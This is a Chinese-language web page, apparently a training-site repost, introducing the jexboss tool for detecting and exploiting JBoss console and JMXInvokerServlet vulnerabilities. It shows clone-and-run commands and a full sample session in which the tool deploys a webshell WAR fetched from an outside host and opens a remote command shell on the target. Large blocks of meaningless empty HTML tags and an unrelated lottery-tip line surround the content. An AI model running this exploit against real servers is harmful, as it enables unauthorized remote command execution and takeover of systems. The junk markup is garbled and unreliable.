<acronym id="qayw8"><small id="qayw8"></small></acronym>
<acronym id="qayw8"></acronym>
<samp id="qayw8"></samp>
<acronym id="qayw8"><small id="qayw8"></small></acronym><acronym id="qayw8"><small id="qayw8"></small></acronym><rt id="qayw8"><optgroup id="qayw8"></optgroup></rt>
<rt id="qayw8"></rt>
<rt id="qayw8"></rt>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<object id="qayw8"><small id="qayw8"></small></object>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<option id="qayw8"></option>
<samp id="qayw8"><noscript id="qayw8"></noscript></samp>
<rt id="qayw8"></rt>
<tr id="qayw8"></tr>
<samp id="qayw8"><noscript id="qayw8"></noscript></samp>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<tt id="qayw8"><div id="qayw8"></div></tt>
<tr id="qayw8"></tr>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<option id="qayw8"></option><samp id="qayw8"><div id="qayw8"></div></samp>
<samp id="qayw8"><noscript id="qayw8"></noscript></samp>
<sup id="qayw8"><small id="qayw8"></small></sup>
<acronym id="qayw8"><optgroup id="qayw8"></optgroup></acronym><tt id="qayw8"><div id="qayw8"></div></tt>
<rt id="qayw8"><optgroup id="qayw8"></optgroup></rt>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<tr id="qayw8"></tr>
<sup id="qayw8"><small id="qayw8"></small></sup>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<rt id="qayw8"></rt>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<sup id="qayw8"><optgroup id="qayw8"></optgroup></sup><tt id="qayw8"><center id="qayw8"></center></tt>
<tr id="qayw8"></tr>
<tr id="qayw8"><xmp id="qayw8">
<option id="qayw8"></option>
<xmp id="qayw8"><samp id="qayw8"></samp>
<xmp id="qayw8"><samp id="qayw8"></samp>
<tt id="qayw8"><div id="qayw8"></div></tt>
<tr id="qayw8"></tr>
<rt id="qayw8"><optgroup id="qayw8"></optgroup></rt>
<acronym id="qayw8"><xmp id="qayw8">
<rt id="qayw8"></rt>
<menu id="qayw8"><wbr id="qayw8"></wbr></menu>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<rt id="qayw8"><optgroup id="qayw8"></optgroup></rt>
<rt id="qayw8"></rt>
<acronym id="qayw8"><small id="qayw8"></small></acronym>

jexboss – Jboss漏洞檢測/利用工具

華盟學院山東省第二期線下學習計劃

項目地址

https://github.com/joaomatosf/jexboss

項目簡介

jexboss是一個使用Python編寫的Jboss漏洞檢測利用工具,通過它可以檢測并利用web-console,jmx-console,JMXInvokerServlet這三個漏洞,并且可以獲得一個shell。

使用方法

$ git clone https://github.com/joaomatosf/jexboss.git
$ cd jexboss
$ python jexboss.py https://site-teste.com
$ python jexboss.py https://site-teste.com
* — JexBoss: Jboss verify and EXploitation Tool — *
| |
| @author: Jo?o Filho Matos Figueiredo |
| @contact: [email protected] |
| |
| @update: https://github.com/joaomatosf/jexboss |
#______________________________________________________#
** Checking Host: https://site-teste.com **

* Checking web-console: [ OK ]
* Checking jmx-console: [ VULNERABLE ]
* Checking JMXInvokerServlet: [ VULNERABLE ]
* Do you want to try to run an automated exploitation via “jmx-console” ?
This operation will provide a simple command shell to execute commands on the server..
Continue only if you have permission!
yes/NO ? yes

* Sending exploit code to https://site-teste.com. Wait…
* Info: This exploit will force the server to deploy the webshell
available on: http://www.joaomatosf.com/rnp/jbossass.war
* Successfully deployed code! Starting command shell, wait…

* – – – –  – – – – – – – – LOL – – – – – – – – – – – – – –  – *

* https://site-teste.com:

Linux seglinux 3.18.4-1.el6.elrepo.x86_64 #1 SMP Wed Jan 28 13:28:52 EST 2015 x86_64 x86_64 x86_64 GNU/Linux

CentOS release 6.5 (Final)

uid=509(jboss) gid=509(jboss) grupos=509(jboss) context=system_u:system_r:initrc_t:s0

[Type commands or “exit” to finish]
Shell> pwd
/usr/jboss-6.1.0.Final/bin

1

評論:

1 條評論,訪客:1 條,站長:0 條

0%好評

  • 好評:(0%)
  • 中評:(0%)
  • 差評:(0%)

最新評論

  1. 匿名發布于: 

    對于電腦只會打字玩游戲的有沒有教材順序?請大佬們指點指點

發表評論

平特心水保荐彩图
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<acronym id="qayw8"></acronym>
<samp id="qayw8"></samp>
<acronym id="qayw8"><small id="qayw8"></small></acronym><acronym id="qayw8"><small id="qayw8"></small></acronym><rt id="qayw8"><optgroup id="qayw8"></optgroup></rt>
<rt id="qayw8"></rt>
<rt id="qayw8"></rt>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<object id="qayw8"><small id="qayw8"></small></object>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<option id="qayw8"></option>
<samp id="qayw8"><noscript id="qayw8"></noscript></samp>
<rt id="qayw8"></rt>
<tr id="qayw8"></tr>
<samp id="qayw8"><noscript id="qayw8"></noscript></samp>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<tt id="qayw8"><div id="qayw8"></div></tt>
<tr id="qayw8"></tr>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<option id="qayw8"></option><samp id="qayw8"><div id="qayw8"></div></samp>
<samp id="qayw8"><noscript id="qayw8"></noscript></samp>
<sup id="qayw8"><small id="qayw8"></small></sup>
<acronym id="qayw8"><optgroup id="qayw8"></optgroup></acronym><tt id="qayw8"><div id="qayw8"></div></tt>
<rt id="qayw8"><optgroup id="qayw8"></optgroup></rt>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<tr id="qayw8"></tr>
<sup id="qayw8"><small id="qayw8"></small></sup>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<rt id="qayw8"></rt>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<sup id="qayw8"><optgroup id="qayw8"></optgroup></sup><tt id="qayw8"><center id="qayw8"></center></tt>
<tr id="qayw8"></tr>
<tr id="qayw8"><xmp id="qayw8">
<option id="qayw8"></option>
<xmp id="qayw8"><samp id="qayw8"></samp>
<xmp id="qayw8"><samp id="qayw8"></samp>
<tt id="qayw8"><div id="qayw8"></div></tt>
<tr id="qayw8"></tr>
<rt id="qayw8"><optgroup id="qayw8"></optgroup></rt>
<acronym id="qayw8"><xmp id="qayw8">
<rt id="qayw8"></rt>
<menu id="qayw8"><wbr id="qayw8"></wbr></menu>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<rt id="qayw8"><optgroup id="qayw8"></optgroup></rt>
<rt id="qayw8"></rt>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<acronym id="qayw8"></acronym>
<samp id="qayw8"></samp>
<acronym id="qayw8"><small id="qayw8"></small></acronym><acronym id="qayw8"><small id="qayw8"></small></acronym><rt id="qayw8"><optgroup id="qayw8"></optgroup></rt>
<rt id="qayw8"></rt>
<rt id="qayw8"></rt>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<object id="qayw8"><small id="qayw8"></small></object>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<option id="qayw8"></option>
<samp id="qayw8"><noscript id="qayw8"></noscript></samp>
<rt id="qayw8"></rt>
<tr id="qayw8"></tr>
<samp id="qayw8"><noscript id="qayw8"></noscript></samp>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<tt id="qayw8"><div id="qayw8"></div></tt>
<tr id="qayw8"></tr>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<option id="qayw8"></option><samp id="qayw8"><div id="qayw8"></div></samp>
<samp id="qayw8"><noscript id="qayw8"></noscript></samp>
<sup id="qayw8"><small id="qayw8"></small></sup>
<acronym id="qayw8"><optgroup id="qayw8"></optgroup></acronym><tt id="qayw8"><div id="qayw8"></div></tt>
<rt id="qayw8"><optgroup id="qayw8"></optgroup></rt>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<tr id="qayw8"></tr>
<sup id="qayw8"><small id="qayw8"></small></sup>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<rt id="qayw8"></rt>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<sup id="qayw8"><optgroup id="qayw8"></optgroup></sup><tt id="qayw8"><center id="qayw8"></center></tt>
<tr id="qayw8"></tr>
<tr id="qayw8"><xmp id="qayw8">
<option id="qayw8"></option>
<xmp id="qayw8"><samp id="qayw8"></samp>
<xmp id="qayw8"><samp id="qayw8"></samp>
<tt id="qayw8"><div id="qayw8"></div></tt>
<tr id="qayw8"></tr>
<rt id="qayw8"><optgroup id="qayw8"></optgroup></rt>
<acronym id="qayw8"><xmp id="qayw8">
<rt id="qayw8"></rt>
<menu id="qayw8"><wbr id="qayw8"></wbr></menu>
<acronym id="qayw8"><small id="qayw8"></small></acronym>
<rt id="qayw8"><optgroup id="qayw8"></optgroup></rt>
<rt id="qayw8"></rt>
<acronym id="qayw8"><small id="qayw8"></small></acronym>